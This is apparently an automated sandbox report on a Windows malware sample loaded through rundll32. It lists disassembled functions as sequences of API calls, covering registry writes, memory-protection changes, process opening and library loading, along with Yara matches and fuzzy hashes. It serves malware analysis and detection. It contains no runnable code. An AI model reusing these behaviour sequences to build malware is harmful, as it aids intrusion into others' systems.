                              • Part of subcall function 04F7508C: GetTempFileNameA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,04F65112,00000000,?,00000000,00000000,?), ref: 04F750DE
                              • Part of subcall function 04F7508C: lstrcpy.KERNEL32(00000000), ref: 04F75100
                              • Part of subcall function 04F6A316: CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04F6A391
                              • Part of subcall function 04F6A316: SetWaitableTimer.KERNEL32(00000000,?,00000000,00000000,00000000,00000000), ref: 04F6A3BD
                              • Part of subcall function 04F6A316: _allmul.NTDLL(?,?,FFFFD8F0,000000FF), ref: 04F6A3CD
                              • Part of subcall function 04F6A316: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,FFFFD8F0,000000FF), ref: 04F6A405
                              • Part of subcall function 04F6A316: SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,?,FFFFD8F0,000000FF), ref: 04F6A427
                              • Part of subcall function 04F6A316: GetShellWindow.USER32 ref: 04F6A436
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FileTempTimerWaitable$FreeHeapInterlockedPathTime$CreateCurrentDecrementDeleteIncrementMultipleNameObjectsShellSystemThreadWaitWindow_allmullstrcpy
                            • String ID:
                            • API String ID: 1587453479-0
                            • Opcode ID: 8b6a9818c48ecfa4063ea635542bc4851688c295a62f6538c04d98a449359ff6
                            • Instruction ID: 9b706f732825490731a4b409f299b7e346a496dca1d8214c02dfd03301416608
                            • Opcode Fuzzy Hash: 8b6a9818c48ecfa4063ea635542bc4851688c295a62f6538c04d98a449359ff6
                            • Instruction Fuzzy Hash: 48116375900209BFEB115FA4DC84EAE3F7DEB44355F10402AFA059E100D779A946EB90
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RegCreateKeyA.ADVAPI32(80000001,?,?), ref: 04F626E7
                            • memcpy.NTDLL(00000000,?,?,?), ref: 04F62710
                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,?), ref: 04F62739
                            • RegSetValueExA.ADVAPI32(?,?,00000000,00000003,00000000,00000000), ref: 04F62759
                            • RegCloseKey.ADVAPI32(?), ref: 04F62764
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Value$AllocateCloseCreateHeapmemcpy
                            • String ID:
                            • API String ID: 2954810647-0
                            • Opcode ID: 155c4c1f25c1e38e54c42ad443501044767b8b03d9ef38cac81efc3ba7d9c7a7
                            • Instruction ID: a5be697ac0b0a2b6ead2f7ef0b93dd08dc5146c857c3614db4a4d4427387d9b4
                            • Opcode Fuzzy Hash: 155c4c1f25c1e38e54c42ad443501044767b8b03d9ef38cac81efc3ba7d9c7a7
                            • Instruction Fuzzy Hash: AC11C27260010DBFEF126E64FC88EBE776DFB44355F010026FE02A61A0E675AD21D7A1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(04F6980C,?,?,?,?,00000008,04F6980C,00000000,?), ref: 04F6E59A
                            • memcpy.NTDLL(04F6980C,?,00000009,?,?,?,?,00000008,04F6980C,00000000,?), ref: 04F6E5BC
                            • RtlAllocateHeap.NTDLL(00000000,00000013), ref: 04F6E5D4
                            • lstrlenW.KERNEL32(00000000,00000001,04F6980C,?,?,?,?,?,?,?,00000008,04F6980C,00000000,?), ref: 04F6E5F4
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,00000008,04F6980C,00000000,?), ref: 04F6E619
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HeapTime$AllocateFileFreeSystemlstrlenmemcpy
                            • String ID:
                            • API String ID: 3065863707-0
                            • Opcode ID: 948d638d493d213f7117334756d93330b4294177cdae6f6c57be48eea0d35d52
                            • Instruction ID: 54f785bf4082b4679a5179fb68c5b4a2b3cc55e0876924e03e9483b24dc0a498
                            • Opcode Fuzzy Hash: 948d638d493d213f7117334756d93330b4294177cdae6f6c57be48eea0d35d52
                            • Instruction Fuzzy Hash: 4111667AE0120CBBDB119FA4EC08FDE7F79EB08714F004055FA19EA280D674DA49DB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrcmpi.KERNEL32(00000000,?), ref: 04F7FEC3
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F7FED0
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F7FEE3
                            • lstrcmpi.KERNEL32(04F8A440,00000000), ref: 04F7FF03
                            • GetSystemTimeAsFileTime.KERNEL32(00000000,?,?,?,04F6404D,00000000), ref: 04F7FF17
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalSectionTimelstrcmpi$EnterFileLeaveSystem
                            • String ID:
                            • API String ID: 1266740956-0
                            • Opcode ID: 7ae6155d7df0fc36969fb7547915e3d8da6b6eaef11d89a8b66bcd8742bb5aeb
                            • Instruction ID: dcff343121023774ebe56d663e71346138370b2553aea4e23177474438eaa937
                            • Opcode Fuzzy Hash: 7ae6155d7df0fc36969fb7547915e3d8da6b6eaef11d89a8b66bcd8742bb5aeb
                            • Instruction Fuzzy Hash: 44115E32D05209EFDB14DF58E849AAAB7E8FF45328B14415FE409DB651D73CED028BA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,00000000,04F83716,00000000,04F72466,?,?,?,04F78A07,?,?,?,00000000,00000001,00000000,?), ref: 04F6326D
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F63291
                            • StrRChrA.SHLWAPI(?,00000000,0000002E,?,00000003,?,?,04F78A07,?,?,?,00000000,00000001,00000000,?,00000000), ref: 04F63298
                            • lstrcpy.KERNEL32(00000000,?), ref: 04F632E0
                            • lstrcat.KERNEL32(00000000,?), ref: 04F632EF
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrcpy$AllocateHeaplstrcatlstrlen
                            • String ID:
                            • API String ID: 2616531654-0
                            • Opcode ID: c6c480d18d360ac71c717e596567387a32d7578aef69ac9846290006d8480535
                            • Instruction ID: cb02967180b36cca6a2c361f1d80499e53db73232e493e9d2ee9dfd188489859
                            • Opcode Fuzzy Hash: c6c480d18d360ac71c717e596567387a32d7578aef69ac9846290006d8480535
                            • Instruction Fuzzy Hash: 0F1173B660060BABD7219E65AC89E7B77ECEB85200F05452DFA06DB104EB29E8468761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F7D580: lstrlen.KERNEL32(00000000,00000000,?,00000000,04F6243E,00000000,00000000,00000000,00000000,?,00000022,00000000,00000000,00000000,?,?), ref: 04F7D58C
                            • RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 04F7E3F6
                            • memcpy.NTDLL(00000000,?,?), ref: 04F7E409
                            • RtlEnterCriticalSection.NTDLL(04F8A428), ref: 04F7E41A
                            • RtlLeaveCriticalSection.NTDLL(04F8A428), ref: 04F7E42F
                            • HeapFree.KERNEL32(00000000,00000000,?,00000000), ref: 04F7E467
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalHeapSection$AllocateEnterFreeLeavelstrlenmemcpy
                            • String ID:
                            • API String ID: 2349942465-0
                            • Opcode ID: d7713e2802a3fe7eac954d84b1a6196acd27691baf53b38ab7ef03304b1651a3
                            • Instruction ID: 0f4190a94d153b7f5b7e3adab92a037b386a3e92ecb518868902a48bf4221c95
                            • Opcode Fuzzy Hash: d7713e2802a3fe7eac954d84b1a6196acd27691baf53b38ab7ef03304b1651a3
                            • Instruction Fuzzy Hash: F411E576941215AFD7106F24FC48C3B7BA9EB85325701416FF9169B210D63EAC069BA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(04F6C1F8,00000000,00000000,00000000,?,04F70FD9,?,04F6C1F8,00000000), ref: 04F74D2D
                            • lstrlen.KERNEL32(?,?,04F70FD9,?,04F6C1F8,00000000), ref: 04F74D34
                            • RtlAllocateHeap.NTDLL(00000000,00000029), ref: 04F74D42
                              • Part of subcall function 04F6EEF2: GetLocalTime.KERNEL32(?,?,?,?,04F7FC9E,00000000,00000001), ref: 04F6EEFC
                              • Part of subcall function 04F6EEF2: wsprintfA.USER32 ref: 04F6EF2F
                            • wsprintfA.USER32 ref: 04F74D64
                              • Part of subcall function 04F6ED48: GetSystemTime.KERNEL32(?,00000000,00000000,00000000,?,04F74D8C,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04F6ED66
                              • Part of subcall function 04F6ED48: wsprintfA.USER32 ref: 04F6ED8B
                            • HeapFree.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000006,?,?,?,00000000), ref: 04F74D95
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: wsprintf$HeapTimelstrlen$AllocateFreeLocalSystem
                            • String ID:
                            • API String ID: 3847261958-0
                            • Opcode ID: 1b6920b283cc277ee76b88000f8a85e210db7826aa2143b9efc0892cfe9c2d14
                            • Instruction ID: 29e6f16d4c2a3e905dad51f2439f16f877bd48be2d65cd4bdc5a3e71721cbe62
                            • Opcode Fuzzy Hash: 1b6920b283cc277ee76b88000f8a85e210db7826aa2143b9efc0892cfe9c2d14
                            • Instruction Fuzzy Hash: DC018436600218FFDB111F25EC44DBA7F6DEF84364F048026FD199A211D63AAD16DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • ResetEvent.KERNEL32(?,00000008,00000000,0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD35
                            • ResetEvent.KERNEL32(?,?,04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD3A
                            • GetLastError.KERNEL32(04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD55
                            • GetLastError.KERNEL32(0000EA60,00000000,00000000,00000000,?,04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD84
                              • Part of subcall function 04F6D429: lstrlen.KERNEL32(00000000,00000008,00000000,00000000,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?,?,00000000), ref: 04F6D435
                              • Part of subcall function 04F6D429: memcpy.NTDLL(00000000,00000000,00000000,00000000,00000001,00000001,?,?,04F7DD0F,00000000,00000000,00000004,00000000,?,04F6DBAC,?), ref: 04F6D493
                              • Part of subcall function 04F6D429: lstrcpy.KERNEL32(00000000,00000000), ref: 04F6D4A3
                            • SetEvent.KERNEL32(?,04F6DBAC,?,?,00000000,04F63EC6,?,00000000), ref: 04F7DD76
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Event$ErrorLastReset$lstrcpylstrlenmemcpy
                            • String ID:
                            • API String ID: 1449191863-0
                            • Opcode ID: e0df420898593117de50431356777d46f129d378762ab49cdb5b4a3748cf3b2a
                            • Instruction ID: 751ae4d1280a21977441ab4fe94e18411138d93b4353f0e1f837d69ac0f80514
                            • Opcode Fuzzy Hash: e0df420898593117de50431356777d46f129d378762ab49cdb5b4a3748cf3b2a
                            • Instruction Fuzzy Hash: 4411A57110050AAFDF216F64EC44EAB3BB9EF08374F508626F915950A0C739FC62DBA0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlAllocateHeap.NTDLL(00000000,00004000,-00000008), ref: 04F80AB4
                              • Part of subcall function 04F7EC09: WaitForSingleObject.KERNEL32(?,00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000), ref: 04F7EC20
                              • Part of subcall function 04F7EC09: SetEvent.KERNEL32(?,?,?,?,04F63EC6,?,?), ref: 04F7EC30
                            • lstrlen.KERNEL32(?,?,?,?,?,04F6859B,?,?), ref: 04F80AD7
                            • lstrlen.KERNEL32(?,?,?,?,04F6859B,?,?), ref: 04F80AE1
                            • memcpy.NTDLL(?,?,00004000,?,?,04F6859B,?,?), ref: 04F80AF2
                            • HeapFree.KERNEL32(00000000,?,?,?,?,04F6859B,?,?), ref: 04F80B14
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Heaplstrlen$AllocateEventFreeObjectSingleWaitmemcpy
                            • String ID:
                            • API String ID: 442095154-0
                            • Opcode ID: 777f820c92f402f4835e3b32b78f73d71899333a0ceae50a537848f14de5eaa0
                            • Instruction ID: 39b0fde1baf293f1049b0987c0db99cab996e538a90139febba36c9dea6b176f
                            • Opcode Fuzzy Hash: 777f820c92f402f4835e3b32b78f73d71899333a0ceae50a537848f14de5eaa0
                            • Instruction Fuzzy Hash: AE11A575A00209FFDB11AF55EC44E5E7BB9EB85354F214069E805EB210EB35ED05DB50
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F6AE7C: lstrlen.KERNEL32(04F6E448,00000000,00000000,?,?,04F77A5B,?,?,?,?,04F6E448,?), ref: 04F6AE8B
                              • Part of subcall function 04F6AE7C: mbstowcs.NTDLL ref: 04F6AEA7
                            • lstrlenW.KERNEL32(00000000,00000000,00000000,?,?,?,?,04F6E448,?), ref: 04F77A6A
                            • RtlAllocateHeap.NTDLL(00000000,?), ref: 04F77A7C
                            • CreateDirectoryW.KERNEL32(00000000,00000000,?,?,04F6E448,?), ref: 04F77A99
                            • lstrlenW.KERNEL32(00000000,?,?,04F6E448,?), ref: 04F77AA5
                            • HeapFree.KERNEL32(00000000,00000000,?,?,04F6E448,?), ref: 04F77AB9
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: lstrlen$Heap$AllocateCreateDirectoryFreembstowcs
                            • String ID:
                            • API String ID: 3403466626-0
                            • Opcode ID: d6456a01c5fc226de72186e62b7e10c88ba1ebaed4a2512fb71fbe848219dd7c
                            • Instruction ID: e9be2d8060fb42a8020bde68cce3c76e286131f94310a80a28226802d07ea289
                            • Opcode Fuzzy Hash: d6456a01c5fc226de72186e62b7e10c88ba1ebaed4a2512fb71fbe848219dd7c
                            • Instruction Fuzzy Hash: 5A014C76601209BFD7119F98FC84FAA77ECEF49314F00405AFA05AF160C779AD059BA5
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetModuleHandleA.KERNEL32 ref: 04F6F4BF
                            • GetModuleHandleA.KERNEL32 ref: 04F6F4CD
                            • LoadLibraryExW.KERNEL32(?,?,?), ref: 04F6F4DA
                            • GetModuleHandleA.KERNEL32 ref: 04F6F4F1
                            • GetModuleHandleA.KERNEL32 ref: 04F6F4FD
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: HandleModule$LibraryLoad
                            • String ID:
                            • API String ID: 1178273743-0
                            • Opcode ID: 2494522b9ec3506beea85fd6307a0d74ff9b7e42b16a59e2dc133aa9e256e707
                            • Instruction ID: d64823dca3388eaf220423196c18e9a908b9ab4f3f438024bc2c593eb67ef3a5
                            • Opcode Fuzzy Hash: 2494522b9ec3506beea85fd6307a0d74ff9b7e42b16a59e2dc133aa9e256e707
                            • Instruction Fuzzy Hash: 66016D71A0020AABDF055F69FC40D7A3BA9EF44261704003AED15C6121DBB5EC229BA4
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • StrChrA.SHLWAPI(00000000,0000003D,00000000,00000000,?,04F6396C), ref: 04F7BDCC
                            • StrTrimA.SHLWAPI(00000001,?,?,04F6396C), ref: 04F7BDEF
                            • StrTrimA.SHLWAPI(00000000,?,?,04F6396C), ref: 04F7BDFE
                            • _strupr.NTDLL ref: 04F7BE01
                            • lstrlen.KERNEL32(00000000,04F6396C), ref: 04F7BE09
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Trim$_struprlstrlen
                            • String ID:
                            • API String ID: 2280331511-0
                            • Opcode ID: 4ad218e498579cd2083a563cc831a186bde05f75cc27d950f9088d2e43c10604
                            • Instruction ID: 60ee99db03f365f64de8aff0375f4385498ef306bdca2e27aeba67876e3f97a7
                            • Opcode Fuzzy Hash: 4ad218e498579cd2083a563cc831a186bde05f75cc27d950f9088d2e43c10604
                            • Instruction Fuzzy Hash: D3F012B1700519AFE715AB64FC88E7B37ECEB46655B14405EF505CF240DF6CAC028761
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • RtlEnterCriticalSection.NTDLL(04F8A400), ref: 04F81664
                            • RtlLeaveCriticalSection.NTDLL(04F8A400), ref: 04F81675
                            • VirtualProtect.KERNEL32(?,00000004,00000040,0000007F,?,?,04F74B8B,?,?,04F8A428,04F625BA,00000003), ref: 04F8168C
                            • VirtualProtect.KERNEL32(?,00000004,0000007F,0000007F,?,?,04F74B8B,?,?,04F8A428,04F625BA,00000003), ref: 04F816A6
                            • GetLastError.KERNEL32(?,?,04F74B8B,?,?,04F8A428,04F625BA,00000003), ref: 04F816B3
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: CriticalProtectSectionVirtual$EnterErrorLastLeave
                            • String ID:
                            • API String ID: 653387826-0
                            • Opcode ID: a14f1946f6054853e8233b14e2732298e6351a2a96d92dc27f4f53cb0893ac05
                            • Instruction ID: 3f592d86e057cefc75a5be5ed74824380d9b0272b24ab0d0d9099d3686806fad
                            • Opcode Fuzzy Hash: a14f1946f6054853e8233b14e2732298e6351a2a96d92dc27f4f53cb0893ac05
                            • Instruction Fuzzy Hash: 3B018F75600609AFD7209F24DD04D6AB7B9FF84720B24411DEA569B690D774FD029F60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,04F72397,?), ref: 04F70820
                            • GetVersion.KERNEL32 ref: 04F7082F
                            • GetCurrentProcessId.KERNEL32 ref: 04F7084B
                            • OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 04F70868
                            • GetLastError.KERNEL32 ref: 04F70887
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Process$CreateCurrentErrorEventLastOpenVersion
                            • String ID:
                            • API String ID: 2270775618-0
                            • Opcode ID: e5a48a142f993d9d52850de0c420fe285f8f8931cfebeca77cc88685aa88a169
                            • Instruction ID: b96d5a4e55a9c9c8f324bfbfe189fff4d8909aa23adac986e3c88ef4b5099a15
                            • Opcode Fuzzy Hash: e5a48a142f993d9d52850de0c420fe285f8f8931cfebeca77cc88685aa88a169
                            • Instruction Fuzzy Hash: 16F04F70E5070AAFE7259F64B81AB353B61EB04B49F54011FE646CE1C0EB7CA852CB94
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • GetCurrentThreadId.KERNEL32 ref: 04F689FB
                            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 04F68A0B
                            • CloseHandle.KERNEL32(00000000,?,?,00000040,?,?,?,?,?,?,00000000,?), ref: 04F68A14
                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,04F72F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 04F68A32
                            • VirtualFree.KERNEL32(?,00000000,00008000,?,?,04F72F34,?,?,00000040,?,?,?,?,?,?,00000000), ref: 04F68A3F
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeVirtual$CloseCurrentHandleObjectSingleThreadWait
                            • String ID:
                            • API String ID: 3667519916-0
                            • Opcode ID: 877ab10e9dad8c2475820efcd96b03e67d07e99e4aa0b3e7fe96f605c98422a3
                            • Instruction ID: da84a7f8268d761e90c97423d850c3d2abbc201668f36622c44b637518f3c2b0
                            • Opcode Fuzzy Hash: 877ab10e9dad8c2475820efcd96b03e67d07e99e4aa0b3e7fe96f605c98422a3
                            • Instruction Fuzzy Hash: ECF03A71601705BFEB206A65EC48B2AB6A8EF44795F10462DF982A6590CB28FC06CA61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • lstrlen.KERNEL32(?,00000000,00000000,?,?,?,?,?), ref: 04F7C4A8
                              • Part of subcall function 04F69394: RtlAllocateHeap.NTDLL(00000000,?,04F70051), ref: 04F693A0
                            • wsprintfA.USER32 ref: 04F7C4D9
                              • Part of subcall function 04F6AAAF: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000000,00000030,?,?,?,?,?,?,?,?,?,?,?,04F6A1A1), ref: 04F6AAC5
                              • Part of subcall function 04F6AAAF: wsprintfA.USER32 ref: 04F6AAED
                              • Part of subcall function 04F6AAAF: lstrlen.KERNEL32(?), ref: 04F6AAFC
                              • Part of subcall function 04F6AAAF: wsprintfA.USER32 ref: 04F6AB3C
                              • Part of subcall function 04F6AAAF: wsprintfA.USER32 ref: 04F6AB71
                              • Part of subcall function 04F6AAAF: memcpy.NTDLL(00000000,?,?), ref: 04F6AB7E
                              • Part of subcall function 04F6AAAF: memcpy.NTDLL(00000008,04F853E8,00000002,00000000,?,?), ref: 04F6AB93
                              • Part of subcall function 04F6AAAF: wsprintfA.USER32 ref: 04F6ABB6
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 04F7C54E
                              • Part of subcall function 04F82968: RtlEnterCriticalSection.NTDLL(0631C2D0), ref: 04F8297E
                              • Part of subcall function 04F82968: RtlLeaveCriticalSection.NTDLL(0631C2D0), ref: 04F82999
                            • HeapFree.KERNEL32(00000000,?,?,?,00000001,?,?,?,?,00000000,00000000,?,?,?), ref: 04F7C538
                            • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 04F7C544
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: wsprintf$Heap$Free$CriticalSectionTimelstrlenmemcpy$AllocateEnterFileLeaveSystem
                            • String ID:
                            • API String ID: 3553201432-0
                            • Opcode ID: a84b0418cb3ace7ffcff3584f8d5d8e0d4c415bea3c703c03b10291d2c055354
                            • Instruction ID: 55e3926c25929aba39c08142afab25121258b84f68ad5e109a7234262ad874d4
                            • Opcode Fuzzy Hash: a84b0418cb3ace7ffcff3584f8d5d8e0d4c415bea3c703c03b10291d2c055354
                            • Instruction Fuzzy Hash: AD21D8B690014DAFCF11DF99ED84CAF7FB9FB48300B00441AF915AA111E775AA25EBA1
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6EFBC
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6EFCD
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6EFE5
                            • CloseHandle.KERNEL32(?), ref: 04F6EFFF
                            • HeapFree.KERNEL32(00000000,?), ref: 04F6F014
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: FreeHeap$CloseHandle
                            • String ID:
                            • API String ID: 1910495013-0
                            • Opcode ID: 8c63f655cc47a216f99b01f47510066b68ba94c89e5f2054432791bedbcc8971
                            • Instruction ID: 583a321848dd34a8a5aa4a9be4cd79b248784ef981b68ef920dfb0c5cea0a2e5
                            • Opcode Fuzzy Hash: 8c63f655cc47a216f99b01f47510066b68ba94c89e5f2054432791bedbcc8971
                            • Instruction Fuzzy Hash: 31212976A01525AFC6219F65EC88C2AFBAAFF49B103540419F40AD7654C735FCA2DBE0
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                              • Part of subcall function 04F6EC00: RegOpenKeyA.ADVAPI32(80000002,Software\Microsoft\WAB\DLLPath,00000001), ref: 04F6EC1B
                              • Part of subcall function 04F6EC00: LoadLibraryA.KERNEL32(00000000,?,00000008,?,00000001), ref: 04F6EC69
                              • Part of subcall function 04F6EC00: GetProcAddress.KERNEL32(00000000,?), ref: 04F6EC82
                              • Part of subcall function 04F6EC00: RegCloseKey.ADVAPI32(00000001,?,00000008,?,00000001), ref: 04F6ECD3
                            • GetLastError.KERNEL32(?,?,00000001), ref: 04F7987C
                            • FreeLibrary.KERNEL32(?,?,00000001), ref: 04F798E4
                            Memory Dump Source
                            • Source File: 00000002.00000002.454031315.0000000004F60000.00000040.10000000.00040000.00000000.sdmp, Offset: 04F60000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_2_2_4f60000_rundll32.jbxd
                            Yara matches
                            Similarity
                            • API ID: Library$AddressCloseErrorFreeLastLoadOpenProc
                            • String ID:
                            • API String ID: 1730969706-0
                            • Opcode ID: b631769d3086ebefa9175065f5d4a8ebdc59acec7726eaf5023021d390d84462
                            • Instruction ID: fac962b6f897f862a2b217f56f657f58c2c4a4773955b6b68b3e1eca026ee9b4
                            • Opcode Fuzzy Hash: b631769d3086ebefa9175065f5d4a8ebdc59acec7726eaf5023021d390d84462
                            • Instruction Fuzzy Hash: 5E711AB5D00209EFDF00DFE4C884DAEBBB9FF48314B54856AE516AB250D779A942CF60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            APIs
                            • SysAllocString.OLEAUT32(?), ref: 04A15BD8
                            • SysFreeString.OLEAUT32(00000000), ref: 04A15CBD
                              • Part of subcall function 04A12732: SysAllocString.OLEAUT32(04A19290), ref: 04A12782
                            • SafeArrayDestroy.OLEAUT32(00000000), ref: 04A15D10
                            • SysFreeString.OLEAUT32(00000000), ref: 04A15D1F
                              • Part of subcall function 04A13A62: Sleep.KERNEL32(000001F4), ref: 04A13AAA
                            Memory Dump Source
                            • Source File: 00000002.00000002.453916382.0000000004A11000.00000020.10000000.00040000.00000000.sdmp, Offset: 04A10000, based on PE: true
                            • Associated: 00000002.00000002.453906631.0000000004A10000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453971261.0000000004A19000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000002.00000002.453992648.0000000004A1A000.00000004.10000000.00040000.00000000.sdmp
